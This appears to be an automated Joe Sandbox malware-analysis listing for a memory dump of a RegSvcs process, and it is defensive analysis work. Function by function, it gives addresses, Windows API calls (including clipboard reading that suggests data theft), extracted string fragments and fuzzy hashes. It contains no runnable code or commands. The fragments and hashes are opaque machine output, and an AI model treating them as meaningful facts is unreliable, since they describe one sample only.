Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 0e9d24a3901733470457e1249cc7f7470b5df7d452cc394c81079ce9d69cb8f4
Instruction ID: 5efd1ee9a03ea3c3eb0c12d762aaad34ed982eea5bb01117e5cc31371429f0ae
Opcode Fuzzy Hash: 0e9d24a3901733470457e1249cc7f7470b5df7d452cc394c81079ce9d69cb8f4
Instruction Fuzzy Hash: 29F0A0FEE805528FDB04CF55EC5446533A3B7D930631D8479D501A3229DE74A902DA45

Function 0043C570 Relevance: 1.5, APIs: 1, Instructions: 15
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043E0F9), ref: 0043C590

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4ca71c55d9fe9b281f7981d367328e1df5632f63ab8c1559b6560bf0dd0d3b5a
Instruction ID: b893ccae00c0100e086c015fd95e4a651a52546402759b79cf5975c20580b1f3
Opcode Fuzzy Hash: 4ca71c55d9fe9b281f7981d367328e1df5632f63ab8c1559b6560bf0dd0d3b5a
Instruction Fuzzy Hash: 28D01231815232FBC6102F28BC05BCB3B54DF5A321F0708A2F404AB075C764EC91DAD8

Function 0043C55B Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0043C561

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1e4e484f05b9e0d440bcaef072417b378b3908eb1398e6cf47b9ef0a4f9b27b4
Instruction ID: acefbe7e0d7c30d89c71afa01d78d71c03f6ee103d6cd382e15fa3716b8bb47b
Opcode Fuzzy Hash: 1e4e484f05b9e0d440bcaef072417b378b3908eb1398e6cf47b9ef0a4f9b27b4
Instruction Fuzzy Hash: 13A012310401109AC5111B10BC08FC53E10DB05221F020051F000040B28260C841C584

Non-executed Functions

Function 00422E6D Relevance: 48.8, APIs: 3, Strings: 24, Instructions: 1504COMMON

Download Yara Rule

Strings

R03!, xrefs: 00422F77
+A#C=]=_, xrefs: 00423F9D
9#', xrefs: 00423040
p7B, xrefs: 004238C0
rp, xrefs: 00423FF3
wdnf, xrefs: 00422F07
CNF8, xrefs: 00422F3F
- $f, xrefs: 00423038
JOSP, xrefs: 00422F6F
"7B, xrefs: 00423719
eN, xrefs: 004241BA
I, xrefs: 00423048
8]pY, xrefs: 00422EFF
_^]\, xrefs: 00423695
=]=_, xrefs: 00423D0E
_^]\, xrefs: 00422EA5
~SS}, xrefs: 00422F37
V], xrefs: 004231FA
Q*RG, xrefs: 00422F5F
s, xrefs: 00422FCA
%", xrefs: 0042334A
g}zh, xrefs: 00422F27
].n^, xrefs: 00422F57
Fm, xrefs: 004231F2

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: "7B$%"$+A#C=]=_$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$p7B$s$wdnf$~SS}$rp
API String ID: 0-3991429261
Opcode ID: e7edffdd5fd14d72b39b69682efa331384b3f5ec70a2e9e708273cc4b8c2f64b
Instruction ID: c461727374bb2b2ad86d2c2bcda0cf258ef6ef710b96b519a2ac6f34890c1cf1
Opcode Fuzzy Hash: e7edffdd5fd14d72b39b69682efa331384b3f5ec70a2e9e708273cc4b8c2f64b
Instruction Fuzzy Hash: 4CB241B5A08311CFD714CF29D8816ABBBF2FF86310F19856DE4859B391D7389902CB96

Function 00433E30 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00433E44
GetClipboardData.USER32 ref: 00433E5F
GlobalLock.KERNEL32 ref: 00433E78
GetWindowLongW.USER32 ref: 00433ED7
GlobalUnlock.KERNEL32 ref: 00433FA9
CloseClipboard.USER32 ref: 00433FB4

Strings

-, xrefs: 00433F1F
}, xrefs: 00433F15
', xrefs: 00433EED
8, xrefs: 00433F01
q, xrefs: 00433EE8
(, xrefs: 00433F1A
I, xrefs: 00433F06
5, xrefs: 00433EF2
*, xrefs: 00433F24
L, xrefs: 00433EFC
6, xrefs: 00433F10
=, xrefs: 00433EF7
;, xrefs: 00433F0B

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: '$($*$-$5$6$8$;$=$I$L$q$}
API String ID: 2832541153-2064290267
Opcode ID: e5da5b9a56329a51e64cc872523e0dfe2627c190021f4751e0eab4ab2fc29bc9
Instruction ID: e1340490ca777862a7890bfc042d0e04e3e37fcf4304b8f7f5516f793469ed24
Opcode Fuzzy Hash: e5da5b9a56329a51e64cc872523e0dfe2627c190021f4751e0eab4ab2fc29bc9
Instruction Fuzzy Hash: E0417FB150C3818ED301AF78958835EFEE0AB89319F04497EE4C987292D7BD8689C757

Function 004239B9 Relevance: 18.3, APIs: 3, Strings: 7, Instructions: 821COMMON

Download Yara Rule

Strings

+A#C=]=_, xrefs: 00423F9D
p7B, xrefs: 004238C0
rp, xrefs: 00423FF3
=]=_, xrefs: 00423D0E
":B, xrefs: 00423A0E
_^]\, xrefs: 00423865
eN, xrefs: 004241BA

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: ":B$+A#C=]=_$=]=_$_^]\$eN$p7B$rp
API String ID: 0-2092896893
Opcode ID: ed0750c71e1987e5a6d7bbb2feff7f6cba7481729a1a1e0e14759066178fedbc
Instruction ID: 182eaf4e6841349a8ef13573fe29d1f0c1c004a6e50f6283d231cbe69a191b93
Opcode Fuzzy Hash: ed0750c71e1987e5a6d7bbb2feff7f6cba7481729a1a1e0e14759066178fedbc
Instruction Fuzzy Hash: 594267B5B04211CFD714CF28D8816AABBB2FF8A311F1A81BDD4459B395D738D942CB85

Function 00411D2B Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 479COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 00411EC3

Strings

L, xrefs: 00411D8F
p, xrefs: 00412095
8, xrefs: 00411EEA
y, xrefs: 00411EF2
[, xrefs: 004121EB
?, xrefs: 00411EE2
a, xrefs: 004121E6
|, xrefs: 00412267
^, xrefs: 00412034

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 8$?$L$[$^$a$p$y$|
API String ID: 237503144-3949209405
Opcode ID: 4a8879f59250b1b40dd97a34ff5c93777886415510556bea7e1a63f8662ddf82
Instruction ID: f3e99263922766072051b57ffb7fb6feee41006b6636dbb619e47a4599fab130
Opcode Fuzzy Hash: 4a8879f59250b1b40dd97a34ff5c93777886415510556bea7e1a63f8662ddf82
Instruction Fuzzy Hash: 3512A17160C7808BC324DB38C5913EFBBE1AF85314F184A2EE9D9D7392D67898858B47

Function 00427740 Relevance: 16.6, Strings: 13, Instructions: 338COMMON

Download Yara Rule

Strings

P-X/, xrefs: 00427F99
O=q?, xrefs: 00427F6D
DE, xrefs: 00427FDB
f!V#, xrefs: 00427F78
r, xrefs: 0042831A
s1z3, xrefs: 00427F4C
!A/C, xrefs: 00427FD0
S%g', xrefs: 00427F83
$Y)[, xrefs: 00427FBA
}5x7, xrefs: 00427F57
1Q>S, xrefs: 00427FA4
}9F;, xrefs: 00427F62
Z)o+, xrefs: 00427F8E

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: !A/C$$Y)[$1Q>S$DE$O=q?$P-X/$S%g'$Z)o+$f!V#$r$s1z3$}5x7$}9F;
API String ID: 0-3413813421
Opcode ID: 458a8bf2b899d5374d71cf77dcf3c349152665624c54811c7463cc9c4c7509d7
Instruction ID: 5d18dcd57d5afae5d2d04a22ff7efa295b4e1cb49f3d19f2d9ec184adb64bcbb
Opcode Fuzzy Hash: 458a8bf2b899d5374d71cf77dcf3c349152665624c54811c7463cc9c4c7509d7
Instruction Fuzzy Hash: FBC1DFB460C3418FE724DF25D85176BBBF1EF81304F05496DE5998B3A2D7388906CB9A

Function 0041C8A0 Relevance: 15.6, Strings: 12, Instructions: 585COMMON

Download Yara Rule

Strings

MO, xrefs: 0041CD10
4UW, xrefs: 0041CCE0
#M%O, xrefs: 0041C9FA
wt, xrefs: 0041CB3E
"nl, xrefs: 0041CC10
a`|v, xrefs: 0041C8A1
uvw, xrefs: 0041CA0A
pv, xrefs: 0041CB36
\701, xrefs: 0041CF55
\701, xrefs: 0041CF0C, 0041CF03
AC, xrefs: 0041CCF8
*", xrefs: 0041CE7A

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: "nl$#M%O$*"$4UW$\701$\701$a`|v$wt$AC$MO$pv$uvw
API String ID: 0-635595044
Opcode ID: 667693208df0268b9ec092dcfe9b45baca584c7d5a41cd89dd0410bc245c86b8
Instruction ID: cacfe30d0b9b21159c86ccf72fc2d8f2746876e9854ab90a0990479cac9f29fc
Opcode Fuzzy Hash: 667693208df0268b9ec092dcfe9b45baca584c7d5a41cd89dd0410bc245c86b8
Instruction Fuzzy Hash: 8902F3B594C3008BC7049F29D8916ABBBF1EFD2314F15892DF4C59B351E238DA49C79A

Function 0041EB80 Relevance: 12.1, Strings: 9, Instructions: 812COMMON

Download Yara Rule

Strings

t|f, xrefs: 0041EE88
hch&, xrefs: 0041EEA8
AL, xrefs: 0041EF3D
f>mI, xrefs: 0041EED0
uvqs, xrefs: 0041EEC0
, xrefs: 0041F25F, 0041F26A, 0041F29C
CPm5, xrefs: 0041EEE0
Yxqs, xrefs: 0041EEC8
O}nl, xrefs: 0041EED8

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: AL$CPm5$O}nl$Yxqs$f>mI$hch&$t|f$uvqs$
API String ID: 0-1556426300
Opcode ID: 735fdd800c882bc2084322a437c9c924766bb235598593207dd1441ed3ed4d6f
Instruction ID: 72dbec98d39b44e021400b4b3f7dd457a245ac0fe219d5a174d4001ed2214f73
Opcode Fuzzy Hash: 735fdd800c882bc2084322a437c9c924766bb235598593207dd1441ed3ed4d6f
Instruction Fuzzy Hash: 0252467050C3918FC721CF25C8406AFBBE1AF95314F144A7EE8E45B392D739994ACB9A

Function 0042B980 Relevance: 10.3, Strings: 8, Instructions: 329COMMON

Download Yara Rule

Strings

pMC@, xrefs: 0042BC3A
47:, xrefs: 0042BBD6
UXWZ, xrefs: 0042BC26
AZDH, xrefs: 0042BC44
220, xrefs: 0042BBE0
nV[k, xrefs: 0042BC30
" , xrefs: 0042BC08
:/', xrefs: 0042BBFE

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 47:$ " $220$AZDH$UXWZ$nV[k$pMC@$:/'
API String ID: 0-3711047884
Opcode ID: a4c9283d45bc98dcba5f61ed0453037d099fbeaad371f82cb7e9938c9b68f646
Instruction ID: 65e572282dc53975798f39d0df5fbe4ea82dc72bdd677536ff169635eb849b4a
Opcode Fuzzy Hash: a4c9283d45bc98dcba5f61ed0453037d099fbeaad371f82cb7e9938c9b68f646
Instruction Fuzzy Hash: 46C169B4904B819FD320AF3A95467A3BFF0EB06300F444A5ED4EA4B795E735601ACBD6

Function 0041747D Relevance: 10.0, APIs: 4, Strings: 1, Instructions: 1238COMMON

Download Yara Rule

Strings

_^]\, xrefs: 004175C5

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: _^]\
API String ID: 0-3116432788
Opcode ID: b96ce21cf214a16ae07447a79efeb4cc0916feeea9f87c928e3a685268b8bebc
Instruction ID: 53d5d62a5b06f007e29734ec6a967500c823bb8f017ec32fffb38b320ea18f22
Opcode Fuzzy Hash: b96ce21cf214a16ae07447a79efeb4cc0916feeea9f87c928e3a685268b8bebc
Instruction Fuzzy Hash: CC8234715083518BC724CF28C8917ABB7F1EFCA324F198A6DE8D5973A5E7388845C746

Function 00418B1B Relevance: 9.7, Strings: 7, Instructions: 994COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00418B44
_^]\, xrefs: 00419425
_^]\, xrefs: 00418DE5
/, xrefs: 004192BA
_^]\, xrefs: 00419115
_^]\, xrefs: 00418F25
BVLm, xrefs: 0041902A

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: /$BVLm$_^]\$_^]\$_^]\$_^]\$_^]\
API String ID: 2994545307-2892575238
Opcode ID: 6e5268ea999838320bcd053c9cc8e9dfea5d0472b35df6685e8a938bf7b93b82
Instruction ID: 8a47e0abde06d641331a8f2ba33a8f9f198beecf63cce3fe2238518d353f80c2
Opcode Fuzzy Hash: 6e5268ea999838320bcd053c9cc8e9dfea5d0472b35df6685e8a938bf7b93b82
Instruction Fuzzy Hash: F5325AB56083408BD718CB348CA17BBB7D2FBD6314F19593DD0D6872A2DB398D428B5A

Function 00426D2E Relevance: 8.0, Strings: 6, Instructions: 482COMMON

Download Yara Rule

Strings

_^]\_^]\, xrefs: 00427064
rqB, xrefs: 0042715F
X^, xrefs: 00426DA5
PV, xrefs: 00426DB3
uYD\, xrefs: 00426E3D
\R, xrefs: 00426DAC

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: _^]\_^]\$rqB$uYD\$PV$X^$\R
API String ID: 0-1627709806
Opcode ID: 3df9218c4e884d0bc4ea657edaa843c97e8fa3da6c91276e4a67d9cf42d70f5f
Instruction ID: 5825545f21314853fe0769d62852bd8f916bf307171877822417e4e5256747d8
Opcode Fuzzy Hash: 3df9218c4e884d0bc4ea657edaa843c97e8fa3da6c91276e4a67d9cf42d70f5f
Instruction Fuzzy Hash: 42F1EEB5E04318CFDB14CFA9D8816AEBBB1FF49304F18446DD642AB351D779A902CB98

Function 0040AB40 Relevance: 8.0, Strings: 6, Instructions: 481COMMON

Download Yara Rule

Strings

]><, xrefs: 0040AC83
>, xrefs: 0040AB5E
Y2^0, xrefs: 0040AC7B
HYZF, xrefs: 0040AE05, 0040B07E, 0040B075
HYZF, xrefs: 0040AE40
UMAG, xrefs: 0040AEF0

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: >$HYZF$HYZF$UMAG$Y2^0$]><
API String ID: 0-2666672646
Opcode ID: 32375935e6ef412caa3837e9f6c66e3b8adf22c54bae03c550ad84a2513a055e
Instruction ID: 560480d45fa7c8791f5dd325a32e0fd9eca2933a49feb221361dc50e24506aec
Opcode Fuzzy Hash: 32375935e6ef412caa3837e9f6c66e3b8adf22c54bae03c550ad84a2513a055e
Instruction Fuzzy Hash: 38E12A7674C7504BD324CF6888512AFBBE2DFC1304F18893EE5E5AB385DA798905878A

Function 004281CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004284BD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004285B4

Strings

_^]\, xrefs: 00428A15
LF7Y, xrefs: 00428951

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LF7Y$_^]\
API String ID: 237503144-3688711800
Opcode ID: 26de5ca542a2a6977b9e84e77be44b5ac01a7d5cb18c837ff72e8e2a41646e8e
Instruction ID: 00d2ad6f27f0b0783341daf9d6c4bd9e01a02a9b0560c8c7bc353a94b2bfb0e2
Opcode Fuzzy Hash: 26de5ca542a2a6977b9e84e77be44b5ac01a7d5cb18c837ff72e8e2a41646e8e
Instruction Fuzzy Hash: 90221375A08351CFD3248F28E88072FB7E1BF8A310F194A7DE995673A1D7349912CB5A

Function 004283D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004284BD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004285B4

Strings

_^]\, xrefs: 00428A15
LF7Y, xrefs: 00428951

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LF7Y$_^]\
API String ID: 237503144-3688711800
Opcode ID: d13f070fd010028f18266c39e4bf0995e2ea579b86d440724d5feb7531688b93
Instruction ID: 9e148bf222026bc2ff09e9b78a5b6d6e6f400f6959469ba780e6b53d717f86de
Opcode Fuzzy Hash: d13f070fd010028f18266c39e4bf0995e2ea579b86d440724d5feb7531688b93
Instruction Fuzzy Hash: F812F175A08351CFD3248F28E88071FBBE1BF8A310F194A6DE995673A1D734D942CB5A

Function 0043CDF0 Relevance: 6.9, Strings: 5, Instructions: 697COMMON

Download Yara Rule

Strings

fiP, xrefs: 0043D2CF
_^]\, xrefs: 0043D006
_^]\, xrefs: 0043CE29
jiP, xrefs: 0043D301
f, xrefs: 0043D081

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: _^]\$_^]\$f$fiP$jiP
API String ID: 2994545307-2734853458
Opcode ID: 02867def88f330cc357aa33e98f5089401e16d469949ca3e2fbae4f2ba5b0f1e
Instruction ID: 745ca490046a6ac68c59f9825e457d0a566b3cc6b4523f93947a3945e487c19a
Opcode Fuzzy Hash: 02867def88f330cc357aa33e98f5089401e16d469949ca3e2fbae4f2ba5b0f1e
Instruction Fuzzy Hash: 972213B1A0C3029FD718CF29D89072FBBE2ABD9314F189A2DE4D597395D634DC418B4A

Function 00418169 Relevance: 6.5, Strings: 5, Instructions: 299COMMON

Download Yara Rule

Strings

gfff, xrefs: 00418458
7, xrefs: 00418419
2h?n, xrefs: 004183A0
^`/4, xrefs: 004181E1
SP, xrefs: 00418396

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 2h?n$7$SP$^`/4$gfff
API String ID: 0-3257051659
Opcode ID: e0427b1a9b77ff7e65e449d5ce122ac57cd39ae6c2270757774d7d10ffd74788
Instruction ID: 27920faaac780ccf3f5efe4f99c0b1a63c78e90bde3d2871b705a1280bebe65e
Opcode Fuzzy Hash: e0427b1a9b77ff7e65e449d5ce122ac57cd39ae6c2270757774d7d10ffd74788
Instruction Fuzzy Hash: 59A14876A143504BD314CF28C8517AFB7E2FBC5318F198A3EE895D7391EA3889428786

Function 004291AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 004291DA

Strings

wpq, xrefs: 004292B7
+Ku, xrefs: 004292AF

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +Ku$wpq
API String ID: 237503144-1953850642
Opcode ID: dd00e6cff4bb86df55339bea6a97020402cd2a79317d379f18720dc196f8341f
Instruction ID: 7bb714cd0adbe8f34d65affdf2b55708b4274e5c8486b9e210027d19f02d6b7d
Opcode Fuzzy Hash: dd00e6cff4bb86df55339bea6a97020402cd2a79317d379f18720dc196f8341f
Instruction Fuzzy Hash: 6F51CE7220C3528FC324CF29984076FB7E2EBC5310F55892EE5D9CB285DB34D50A8B96

Function 004348C2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00434910
GetSystemMetrics.USER32 ref: 0043491F

Strings

, xrefs: 004349F3

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: e2dbdaae214771375078ea694cbe3190168a6d9690373aa5dbc97004a2b0131a
Instruction ID: fc399c5893f09ab22ce38e0ca23dce90b2d9510c132352c7ff6b67ebebce5796
Opcode Fuzzy Hash: e2dbdaae214771375078ea694cbe3190168a6d9690373aa5dbc97004a2b0131a
Instruction Fuzzy Hash: 725160B4E142089FCB40EFACD98569DBBF0AB48710F11852EE898E7350D734A944CF96

Function 004290D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00429170

Strings

M/(, xrefs: 0042913D
M/(, xrefs: 0042919E

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: M/($M/(
API String ID: 237503144-1710806632
Opcode ID: ff58c78b0b27bbba40667f193cd225ec620092edf491b3be0aa44738014710da
Instruction ID: a6fe4633539d009e024b46cdafe5f934a4e6010abeff1ae95be2d2e31fad33eb
Opcode Fuzzy Hash: ff58c78b0b27bbba40667f193cd225ec620092edf491b3be0aa44738014710da
Instruction Fuzzy Hash: 9E21017165C3615BE714CE34A88579BB7AAEBC2700F01892CA0D1AB2C5D679880B8756

Function 0042A5B6 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

i, xrefs: 0042A5CD
VN, xrefs: 0042A520
i, xrefs: 0042A527
VN, xrefs: 0042A5C6

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: VN$VN$i$i
API String ID: 0-1885346908
Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
Instruction ID: 20de38ffdec1ef662448aae0f94b74d237ba66483fbda11b24aa8be7d4a8abcc
Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
Instruction Fuzzy Hash: B721F6212083918BD3058E6590402A7BBE3AFC6318F684A5FD8F15B395E63BC94A875B

Function 00414CA0 Relevance: 4.8, Strings: 3, Instructions: 1046COMMON

Download Yara Rule

Strings

D]+\, xrefs: 00415380
7UA, xrefs: 00415528
_^]\, xrefs: 00415715

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 7UA$D]+\$_^]\
API String ID: 0-3619184598
Opcode ID: 2e0cd4d93215bffa60c50a2cc29c154bb915ce2da521f1faa8d3ae08ee25634b
Instruction ID: 9cee455d72e7dd9915cda87ad3665199875abe0b71a1f7719e3c07a7155446ef
Opcode Fuzzy Hash: 2e0cd4d93215bffa60c50a2cc29c154bb915ce2da521f1faa8d3ae08ee25634b
Instruction Fuzzy Hash: E4524474608300DBE704DF28EC527BBB3A1FB86314F19493DE586973A1E7399981CB5A

Function 0042D17D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(1A11171A), ref: 0042D2A4

Strings

#v, xrefs: 0042D2A4

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeLibrary
String ID: #v
API String ID: 3664257935-554117064
Opcode ID: 78db4c3670b02004b5ce09dd30d6be68ef6f26a73c645ae10e47e490a35e64f0
Instruction ID: 8c0201977aaad96103e3db66e91fe0e05dd0d7e7661fbda8aa4fd031d2e77fc5
Opcode Fuzzy Hash: 78db4c3670b02004b5ce09dd30d6be68ef6f26a73c645ae10e47e490a35e64f0
Instruction Fuzzy Hash: 1B41F3706043828BE3158F34D9A0B63BFE0EF57318F28869DE5D64B393D63998068769

Function 00440D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON

Download Yara Rule

Strings

@Ukx, xrefs: 00440F53
, xrefs: 00440DC3, 00440EAB

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: @Ukx$
API String ID: 2994545307-3636270652
Opcode ID: 68fd1405b344facc4b0026b9fe161e78bdc877d3fcaeb6f8274981348c185207
Instruction ID: 03a383fb22d51b403848371ba2a4540fe2b40c56cab5129fcdd4839ce92f9fe8
Opcode Fuzzy Hash: 68fd1405b344facc4b0026b9fe161e78bdc877d3fcaeb6f8274981348c185207
Instruction Fuzzy Hash: DDB17833B083104BE728CE28DCD22BBB792EBC5314F19C93DDA9657395DA399C458786

Function 00409780 Relevance: 2.9, Strings: 2, Instructions: 420COMMON

Download Yara Rule

Strings

1, xrefs: 00409A7B
A, xrefs: 00409922

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 1$A
API String ID: 0-719046165
Opcode ID: bd1ee34c9fa08e29029345848de4dd2afdd75f18fa78b65bf56a6416e37b6555
Instruction ID: e807b6bde7ca49dc404e07dafbff5fc9189e5662c362ff5d9520ac40bf6a6c7c
Opcode Fuzzy Hash: bd1ee34c9fa08e29029345848de4dd2afdd75f18fa78b65bf56a6416e37b6555
